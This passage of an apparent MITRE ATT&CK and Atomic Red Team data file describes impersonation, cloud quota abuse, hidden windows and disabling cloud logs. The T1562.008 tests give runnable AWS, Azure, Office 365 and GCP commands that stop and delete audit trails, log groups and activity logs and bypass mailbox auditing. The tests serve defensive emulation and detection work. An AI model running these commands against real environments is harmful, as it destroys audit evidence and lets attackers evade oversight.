url: https://www.cloudflare.com/learning/email-security/what-is-vendor-email-compromise/#:~:text=Vendor%20email%20compromise%2C%20also%20referred,steal%20from%20that%20vendor%27s%20customers.
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:41:31.140Z'
name: Impersonation
description: "Adversaries may impersonate a trusted person or organization in
order to persuade and trick a target into performing some action on their
behalf. For example, adversaries may communicate with victims (via [Phishing
for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566),
or [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)) while
impersonating a known sender such as an executive, colleague, or third-party
vendor. Established trust can then be leveraged to accomplish an adversary’s
ultimate goals, possibly against multiple victims. \n \nIn many cases of business
email compromise or email fraud campaigns, adversaries use impersonation to
defraud victims -- deceiving them into sending money or divulging information
that ultimately enables [Financial Theft](https://attack.mitre.org/techniques/T1657).\n\nAdversaries
will often also use social engineering techniques such as manipulative and
persuasive language in email subject lines and body text such as `payment`,
`request`, or `urgent` to push the victim to act quickly before malicious
activity is detected. These campaigns are often specifically targeted against
people who, due to job roles and/or accesses, can carry out the adversary’s
goal. \n \nImpersonation is typically preceded by reconnaissance techniques
such as [Gather Victim Identity Information](https://attack.mitre.org/techniques/T1589)
and [Gather Victim Org Information](https://attack.mitre.org/techniques/T1591)
as well as acquiring infrastructure such as email domains (i.e. [Domains](https://attack.mitre.org/techniques/T1583/001))
to substantiate their false identity.(Citation: CrowdStrike-BEC)\n \nThere
is the potential for multiple victims in campaigns involving impersonation.
For example, an adversary may [Compromise Accounts](https://attack.mitre.org/techniques/T1586)
targeting one organization which can then be used to support impersonation
against other entities.(Citation: VEC)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Pawel Partyka, Microsoft Threat Intelligence
- Blake Strom, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Office Suite
- SaaS
- Windows
x_mitre_version: '1.1'
atomic_tests: []
T1578.005:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--ca00366b-83a1-4c7b-a0ce-8ff950a7c87f
created: '2023-09-05T14:19:17.486Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1578/005
external_id: T1578.005
- source_name: Microsoft Cryptojacking 2023
description: 'Microsoft Threat Intelligence. (2023, July 25). Cryptojacking:
Understanding and defending against cloud compute resource abuse. Retrieved
September 5, 2023.'
url: https://www.microsoft.com/en-us/security/blog/2023/07/25/cryptojacking-understanding-and-defending-against-cloud-compute-resource-abuse/
- source_name: Microsoft Azure Policy
description: Microsoft. (2023, August 30). Azure Policy built-in policy definitions.
Retrieved September 5, 2023.
url: https://learn.microsoft.com/en-us/azure/governance/policy/samples/built-in-policies#compute
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-04-15T22:49:17.012Z'
name: Modify Cloud Compute Configurations
description: "Adversaries may modify settings that directly affect the size,
locations, and resources available to cloud compute infrastructure in order
to evade defenses. These settings may include service quotas, subscription
associations, tenant-wide policies, or other configurations that impact available
compute. Such modifications may allow adversaries to abuse the victim’s compute
resources to achieve their goals, potentially without affecting the execution
of running instances and/or revealing their activities to the victim.\n\nFor
example, cloud providers often limit customer usage of compute resources via
quotas. Customers may request adjustments to these quotas to support increased
computing needs, though these adjustments may require approval from the cloud
provider. Adversaries who compromise a cloud environment may similarly request
quota adjustments in order to support their activities, such as enabling additional
[Resource Hijacking](https://attack.mitre.org/techniques/T1496) without raising
suspicion by using up a victim’s entire quota.(Citation: Microsoft Cryptojacking
2023) Adversaries may also increase allowed resource usage by modifying any
tenant-wide policies that limit the sizes of deployed virtual machines.(Citation:
Microsoft Azure Policy)\n\nAdversaries may also modify settings that affect
where cloud resources can be deployed, such as enabling [Unused/Unsupported
Cloud Regions](https://attack.mitre.org/techniques/T1535). "
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Amir Gharib, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
x_mitre_version: '2.0'
atomic_tests: []
T1562.008:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--cacc40da-4c9e-462c-80d5-fd70a178b12d
created: '2020-10-12T13:52:32.846Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1562/008
external_id: T1562.008
- source_name: Stopping CloudTrail from Sending Events to CloudWatch Logs
description: Amazon Web Services. (n.d.). Stopping CloudTrail from Sending
Events to CloudWatch Logs. Retrieved October 16, 2020.
url: https://docs.aws.amazon.com/awscloudtrail/latest/userguide/stop-cloudtrail-from-sending-events-to-cloudwatch-logs.html
- source_name: AWS Update Trail
description: AWS. (n.d.). update-trail. Retrieved August 4, 2023.
url: https://awscli.amazonaws.com/v2/documentation/api/latest/reference/cloudtrail/update-trail.html
- source_name: 'Following the CloudTrail: Generating strong AWS security signals
with Sumo Logic'
description: 'Dan Whalen. (2019, September 10). Following the CloudTrail:
Generating strong AWS security signals with Sumo Logic. Retrieved October
16, 2020.'
url: https://expel.io/blog/following-cloudtrail-generating-aws-security-signals-sumo-logic/
- source_name: Configuring Data Access audit logs
description: Google. (n.d.). Configuring Data Access audit logs. Retrieved
October 16, 2020.
url: https://cloud.google.com/logging/docs/audit/configure-data-access
- source_name: Dark Reading Microsoft 365 Attacks 2021
description: Kelly Sheridan. (2021, August 5). Incident Responders Explore
Microsoft 365 Attacks in the Wild. Retrieved March 17, 2023.
url: https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild/d/d-id/1341591
- source_name: az monitor diagnostic-settings
description: Microsoft. (n.d.). az monitor diagnostic-settings. Retrieved
October 16, 2020.
url: https://docs.microsoft.com/en-us/cli/azure/monitor/diagnostic-settings?view=azure-cli-latest#az_monitor_diagnostic_settings_delete
- source_name: Pacu Detection Disruption Module
description: Rhino Security Labs. (2021, April 29). Pacu Detection Disruption
Module. Retrieved August 4, 2023.
url: https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:23.308Z'
name: 'Impair Defenses: Disable Cloud Logs'
description: |-
An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities.
For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic) They may alternatively tamper with logging functionality – for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Update Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the `Set-MailboxAuditBypassAssociation` cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user’s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading Microsoft 365 Attacks 2021)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
- Sekhar Sarukkai, McAfee
- Ibrahim Ali Khan
- Alex Soler, AttackIQ
- Janantha Marasinghe
- Matt Snyder, VMware
- Joe Gumke, U.S. Bank
- Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- IaaS
- SaaS
- Office Suite
- Identity Provider
x_mitre_version: '2.1'
identifier: T1562.008
atomic_tests:
- name: AWS - CloudTrail Changes
auto_generated_guid: 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e
description: 'Creates a new cloudTrail in AWS, Upon successful creation it will
Update,Stop and Delete the cloudTrail
'
supported_platforms:
- iaas:aws
input_arguments:
cloudtrail_name:
description: Name of the cloudTrail
type: string
default: redatomictesttrail
s3_bucket_name:
description: Name of the bucket
type: string
default: redatomic-test
region:
description: Name of the region
type: string
default: us-east-1
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
default profile using: aws configure
'
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: "echo Please install the terraform and configure your
aws default profile \n"
- description: 'Check if the dependency resources are already present.
'
prereq_command: 'if [ -f "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/terraform.tfstate"
]; then exit 0; else exit 1; fi;
'
get_prereq_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform init
terraform apply -auto-approve
executor:
command: |
aws cloudtrail update-trail --name #{cloudtrail_name} --s3-bucket-name #{s3_bucket_name} --is-multi-region-trail --region #{region}
aws cloudtrail stop-logging --name #{cloudtrail_name} --region #{region}
aws cloudtrail delete-trail --name #{cloudtrail_name} --region #{region}
cleanup_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-1/"
terraform destroy -auto-approve
name: sh
elevation_required: false
- name: Azure - Eventhub Deletion
auto_generated_guid: 5e09bed0-7d33-453b-9bf3-caea32bff719
description: |
Identifies an Event Hub deletion in Azure.
An Event Hub is an event processing service that ingests and processes large volumes of events and data.
An adversary may delete an Event Hub in an attempt to evade detection.
https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-about.
supported_platforms:
- iaas:azure
input_arguments:
username:
description: Azure username
type: string
default:
password:
description: Azure password
type: string
default:
event_hub_name:
description: Name of the eventhub
type: string
default: test_eventhub
resource_group:
description: Name of the resource group
type: string
default:
name_space_name:
description: Name of the NameSpace
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: 'Install-Module -Name Az
'
prereq_command: 'try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue)
{exit 0} else {exit 1}} catch {exit 1}
'
get_prereq_command: 'Install-Module -Name AzureAD -Force
'
- description: 'Check if terraform is installed.
'
prereq_command: 'terraform version
'
get_prereq_command: 'echo Please install the terraform.
'
- description: 'Check if the user is logged into Azure.
'
prereq_command: 'az account show
'
get_prereq_command: "echo Configure your Azure account using: az login. \n"
- description: 'Create dependency resources using terraform
'
prereq_command: 'try {if (Test-Path "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/terraform.tfstate"
){ exit 0 } else {exit 1}} catch {exit 1}
'
get_prereq_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform init
terraform apply -auto-approve
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-AzureAD -Credential $creds
Remove-AzEventHub -ResourceGroupName #{resource_group} -Namespace #{name_space_name} -Name #{event_hub_name}
name: powershell
elevation_required: false
cleanup_command: |
cd "$PathToAtomicsFolder/T1562.008/src/T1562.008-2/"
terraform destroy -auto-approve
- name: Office 365 - Exchange Audit Log Disabled
auto_generated_guid: 1ee572f3-056c-4632-a7fc-7e7c42b1543c
description: |
You can use the Exchange Management Shell to enable or disable mailbox audit logging for a mailbox.
Unified or Admin Audit logs are disabled via the Exchange Powershell cmdline.
https://github.com/Azure/Azure-Sentinel/blob/master/Detections/OfficeActivity/exchange_auditlogdisabled.yaml
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: string
default:
password:
description: office-365 password
type: string
default:
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
'
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: "Install-Module -Name ExchangeOnlineManagement \nImport-Module
ExchangeOnlineManagement\n"
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $False
cleanup_command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-AdminAuditLogConfig -UnifiedAuditLogIngestionEnabled $True
name: powershell
elevation_required: false
- name: AWS - Disable CloudTrail Logging Through Event Selectors using Stratus
auto_generated_guid: a27418de-bdce-4ebd-b655-38f11142bf0c
description: 'Update event selectors in AWS CloudTrail to disable the logging
of certain management events to evade defense. This Atomic test leverages
a tool called Stratus-Red-Team built by DataDog (https://github.com/DataDog/stratus-red-team).
Stratus Red Team is a self-contained binary. You can use it to easily detonate
offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-event-selectors/
'
supported_platforms:
- linux
- macos
- iaas:aws
input_arguments:
stratus_path:
description: Path of stratus binary
type: path
default: "$PathToAtomicsFolder/T1562.008/src"
aws_region:
description: AWS region to detonate
type: string
default: us-west-2
dependency_executor_name: sh
dependencies:
- description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
'
prereq_command: 'if [ -f #{stratus_path}/stratus ]; then exit 0; else exit
1; fi;
'
get_prereq_command: "if [ \"$(uname)\" == \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
-s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
| grep browser_download_url | grep Darwin_x86_64 | cut -d '\"' -f 4); wget
-q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n tar
-xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
[ \"$(expr substr $(uname) 1 5)\" == \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
-s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
| grep browser_download_url | grep linux_x86_64 | cut -d '\"' -f 4) \n wget
-q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n tar
-xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi\n"
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
'
executor:
command: "export AWS_REGION=#{aws_region} \ncd #{stratus_path}\necho \"starting
warmup\"\n./stratus warmup aws.defense-evasion.cloudtrail-event-selectors\necho
\"starting detonate\"\n./stratus detonate aws.defense-evasion.cloudtrail-event-selectors
--force\n"
cleanup_command: |
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
name: sh
elevation_required: false
- name: AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus
auto_generated_guid: 22d89a2f-d475-4895-b2d4-68626d49c029
description: 'This Atomic test will use the Stratus Red Team will first setup
a CloudTrail logging into an S3 bucket and will then make an API call to update
the lifecycle rule on that S3 bucket with an expiration date of 1 day. This
will essentially delete all the logs after one day. Adversaries often do this
actiivity to evade detection. Stratus Red Team is a self-contained binary.
You can use it to easily detonate offensive attack techniques against a live
cloud environment. ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.cloudtrail-lifecycle-rule/
'
supported_platforms:
- linux
- macos
- iaas:aws
input_arguments:
stratus_path:
description: Path of stratus binary
type: path
default: "$PathToAtomicsFolder/T1562.008/src"
aws_region:
description: AWS region to detonate
type: string
default: us-west-2
dependency_executor_name: sh
dependencies:
- description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
'
prereq_command: 'if [ -f #{stratus_path}/stratus ]; then exit 0; else exit
1; fi;
'
get_prereq_command: "if [ \"$(uname)\" == \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
-s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
| grep browser_download_url | grep Darwin_x86_64 | cut -d '\"' -f 4); wget
-q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n tar
-xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
[ \"$(expr substr $(uname) 1 5)\" == \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
-s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
| grep browser_download_url | grep linux_x86_64 | cut -d '\"' -f 4) \n wget
-q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n tar
-xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi\n"
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
'
executor:
command: "export AWS_REGION=#{aws_region} \ncd #{stratus_path}\necho \"starting
warmup\"\n./stratus warmup aws.defense-evasion.cloudtrail-lifecycle-rule\necho
\"starting detonate\"\n./stratus detonate aws.defense-evasion.cloudtrail-lifecycle-rule
--force\n"
cleanup_command: |
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
name: sh
elevation_required: false
- name: AWS - Remove VPC Flow Logs using Stratus
auto_generated_guid: 93c150f5-ad7b-4ee3-8992-df06dec2ac79
description: 'This Atomic will attempt to remove AWS VPC Flow Logs configuration.
Stratus Red Team is a self-contained binary. You can use it to easily detonate
offensive attack techniques against a live cloud environment. Ref: https://stratus-red-team.cloud/attack-techniques/AWS/aws.defense-evasion.vpc-remove-flow-logs/
'
supported_platforms:
- linux
- macos
- iaas:aws
input_arguments:
stratus_path:
description: Path of stratus binary
type: path
default: "$PathToAtomicsFolder/T1562.008/src"
aws_region:
description: AWS region to detonate
type: string
default: us-west-2
dependency_executor_name: sh
dependencies:
- description: 'Stratus binary must be present at the (#{stratus_path}/stratus)
'
prereq_command: 'if [ -f #{stratus_path}/stratus ]; then exit 0; else exit
1; fi;
'
get_prereq_command: "if [ \"$(uname)\" == \"Darwin\" ]\nthen DOWNLOAD_URL=$(curl
-s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
| grep browser_download_url | grep Darwin_x86_64 | cut -d '\"' -f 4); wget
-q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n tar
-xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nelif
[ \"$(expr substr $(uname) 1 5)\" == \"Linux\" ]\nthen DOWNLOAD_URL=$(curl
-s https://api.github.com/repos/DataDog/stratus-red-team/releases/latest
| grep browser_download_url | grep linux_x86_64 | cut -d '\"' -f 4) \n wget
-q -O #{stratus_path}/stratus-red-team-latest.tar.gz $DOWNLOAD_URL\n tar
-xzvf #{stratus_path}/stratus-red-team-latest.tar.gz --directory #{stratus_path}/\nfi\n"
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
'
executor:
command: "export AWS_REGION=#{aws_region} \ncd #{stratus_path}\necho \"starting
warmup\"\n./stratus warmup aws.defense-evasion.vpc-remove-flow-logs\necho
\"starting detonate\"\n./stratus detonate aws.defense-evasion.vpc-remove-flow-logs
--force\n"
cleanup_command: |
export AWS_REGION=#{aws_region}
echo "Cleanup detonation"
cd #{stratus_path}
./stratus cleanup --all
rm -rf stratus*
name: sh
elevation_required: false
- name: AWS - CloudWatch Log Group Deletes
auto_generated_guid: 89422c87-b57b-4a04-a8ca-802bb9d06121
description: "Creates a new cloudWatch log group in AWS, Upon successful creation
it will Delete the group. Attackers can use this technique to evade defenses
by \ndeleting the log stream. Once it is deleted, the logs created by the
attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-group-deletion.html#aws-cloudwatch-log-group-deletion\n"
supported_platforms:
- iaas:aws
input_arguments:
cloudwatch_log_group_name:
description: Name of the cloudWatch log group
type: string
default: log-test
region:
description: Name of the region
type: string
default: us-east-1
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
'
executor:
command: |
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
name: sh
elevation_required: false
- name: AWS CloudWatch Log Stream Deletes
auto_generated_guid: 33ca84bc-4259-4943-bd36-4655dc420932
description: "Creates a new cloudWatch log stream in AWS, Upon successful creation
it will Delete the stream. Attackers can use this technique to evade defenses
by \ndeleting the log stream. Once it is deleted, the logs created by the
attackers will not be logged. https://www.elastic.co/guide/en/security/current/aws-cloudwatch-log-stream-deletion.html\n"
supported_platforms:
- iaas:aws
input_arguments:
cloudwatch_log_group_name:
description: Name of the cloudWatch log group
type: string
default: test-logs
cloudwatch_log_stream_name:
description: Name of the cloudWatch log stream
type: string
default: '20150601'
region:
description: Name of the region
type: string
default: us-west-2
dependencies:
- description: 'Check if ~/.aws/credentials file has a default stanza is configured
'
prereq_command: 'cat ~/.aws/credentials | grep "default"
'
get_prereq_command: 'echo Please install the aws-cli and configure your AWS
defult profile using: aws configure
'
executor:
command: |
aws logs create-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Created ***"
aws logs create-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Created ***"
aws logs delete-log-stream --log-group-name #{cloudwatch_log_group_name} --log-stream-name #{cloudwatch_log_stream_name} --region #{region}
echo "*** Log Stream Deleted ***"
aws logs delete-log-group --log-group-name #{cloudwatch_log_group_name} --region #{region} --output json
echo "*** Log Group Deleted ***"
cleanup_command:
name: sh
elevation_required: false
- name: Office 365 - Set Audit Bypass For a Mailbox
auto_generated_guid: c9a2f6fe-7197-488c-af6d-10c782121ca6
description: |
Use Exchange Management Shell to Mailbox auditing to bypass. It will prevent any mailbox audit logging entries being generated for the target e-mail box.
https://learn.microsoft.com/en-us/powershell/module/exchange/set-mailboxauditbypassassociation?view=exchange-ps
supported_platforms:
- office-365
input_arguments:
username:
description: office-365 username
type: string
default: o365_user_test
password:
description: office-365 password
type: string
default: o365_password_test
target_email:
description: office-365 target_email
type: string
default: o365_email_test
dependency_executor_name: powershell
dependencies:
- description: 'ExchangeOnlineManagement PowerShell module must be installed
'
prereq_command: |
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
get_prereq_command: "Install-Module -Name ExchangeOnlineManagement \nImport-Module
ExchangeOnlineManagement\n"
executor:
command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $true
cleanup_command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Set-MailboxAuditBypassAssociation -Identity "#{target_email}" -AuditBypassEnabled $false
Disconnect-ExchangeOnline -Confirm:$false
name: powershell
elevation_required: false
- name: GCP - Delete Activity Event Log
auto_generated_guid: d56152ec-01d9-42a2-877c-aac1f6ebe8e6
description: "GCP provides 4 types of Cloud Audit Logs: Admin Activity, Data
Access, System Events, and Policy Denied.\nAn adversary may attempt to delete
logs in order to hide their activity. However, Admin Activity, System Events,
and Policy Deny events logs cannot be deleted. \n\nThis Atomic attempts to
delete the Activity Event log. An event is generated under the method name
of `google.logging.v2.LoggingServiceV2.DeleteLog` with a Serverity of `ERROR`.\n"
supported_platforms:
- iaas:gcp
input_arguments:
project-id:
description: ID of the GCP Project you to execute the command against.
type: string
default: atomic-project-1
executor:
name: sh
elevation_required: false
command: |
gcloud config set project #{project-id}
gcloud logging logs delete projects/#{project-id}/logs/cloudaudit.googleapis.com%2Factivity --quiet
dependency_executor_name: sh
dependencies:
- description: 'Requires gcloud
'
prereq_command: 'if [ -x "$(command -v gcloud)" ]; then exit 0; else exit
1; fi;
'
get_prereq_command: 'echo "Please Install Google Cloud SDK before running
this atomic test : https://cloud.google.com/sdk/docs/install"
'
- description: "Check if user is logged in \n"
prereq_command: 'gcloud config get-value account
'
get_prereq_command: 'gcloud auth login --no-launch-browser
'
T1564.003:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--cbb66055-0325-4111-aca0-40547b6ad5b0
created: '2020-03-13T20:26:49.433Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1564/003
external_id: T1564.003
- source_name: Cantoris Computing
description: Cantoris. (2016, July 22). PowerShell Malware. Retrieved December
12, 2024.
url: https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/
- source_name: Cybereason - Hidden Malicious Remote Access
description: 'Cybereason Security Services Team. (n.d.). Behind Closed Doors:
The Rise of Hidden Malicious Remote Access. Retrieved July 22, 2025.'
url: https://www.cybereason.com/blog/behind-closed-doors-the-rise-of-hidden-malicious-remote-access
- source_name: LOLBAS Project GitHub Device Cred Dep
description: Elliot Killick. (n.d.). /DeviceCredentialDeployment.exe. Retrieved
July 22, 2025.
url: https://lolbas-project.github.io/lolbas/Binaries/DeviceCredentialDeployment/
- source_name: Hidden VNC
description: Hutchins, Marcus. (2015, September 13). Hidden VNC for Beginners.
Retrieved November 28, 2023.
url: https://www.malwaretech.com/2015/09/hidden-vnc-for-beginners.html
- source_name: Anatomy of an hVNC Attack
description: Keshet, Lior. Kessem, Limor. (2017, January 25). Anatomy of an
hVNC Attack. Retrieved November 28, 2023.
url: https://securityintelligence.com/anatomy-of-an-hvnc-attack/
- source_name: SecureList BlueNoroff Device Cred Dev
description: Seongsu Park. (2022, December 27). BlueNoroff introduces new
methods bypassing MoTW. Retrieved July 22, 2025.
url: https://securelist.com/bluenoroff-methods-bypass-motw/108383/
- source_name: Antiquated Mac Malware
description: Thomas Reed. (2017, January 18). New Mac backdoor using antiquated
code. Retrieved July 5, 2017.
url: https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/
- source_name: PowerShell About 2019
description: Wheeler, S. et al.. (2019, May 1). About PowerShell.exe. Retrieved
October 11, 2019.
url: https://docs.microsoft.com/en-us/powershell/module/Microsoft.PowerShell.Core/About/about_PowerShell_exe?view=powershell-5.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:23.485Z'
name: 'Hide Artifacts: Hidden Window'
description: "Adversaries may use hidden windows to conceal malicious activity
from the plain sight of users. In some cases, windows that would typically
be displayed when an application carries out an operation can be hidden. This
may be utilized by system administrators to avoid disrupting user work environments
when carrying out administrative tasks. \n\nAdversaries may abuse these functionalities
to hide otherwise visible windows from users so as not to alert the user to
adversary activity on the system.(Citation: Antiquated Mac Malware)\n\nOn
macOS, the configurations for how applications run are listed in property
list (plist) files. One of the tags in these files can be apple.awt.UIElement,
which allows for Java applications to prevent the application's icon from
appearing in the Dock. A common use for this is when applications run in the
system tray, but don't also want to show up in the Dock.\n\nSimilarly, on
Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001),
Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005)
to make windows hidden. One example of this is powershell.exe -WindowStyle
Hidden.(Citation: PowerShell About 2019)\n\nThe Windows Registry can
also be edited to hide application windows from the current user. For example,
by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\\Console\\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe`
Registry key to a maximum value, PowerShell windows will open off screen and
be hidden.(Citation: Cantoris Computing)\n\nIn addition, Windows supports
the `CreateDesktop()` API that can create a hidden desktop window with its
own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation:
Anatomy of an hVNC Attack) All applications running on the hidden desktop
window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be
